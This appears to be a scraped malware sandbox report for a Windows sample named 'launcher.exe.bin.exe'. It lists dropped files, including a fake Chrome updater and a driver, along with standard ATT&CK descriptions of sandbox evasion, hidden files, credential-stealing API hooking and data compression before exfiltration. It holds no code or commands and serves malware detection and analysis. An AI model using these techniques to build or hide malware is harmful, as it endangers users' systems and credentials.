Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Windows Analysis Report
launcher.exe.bin.exe

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre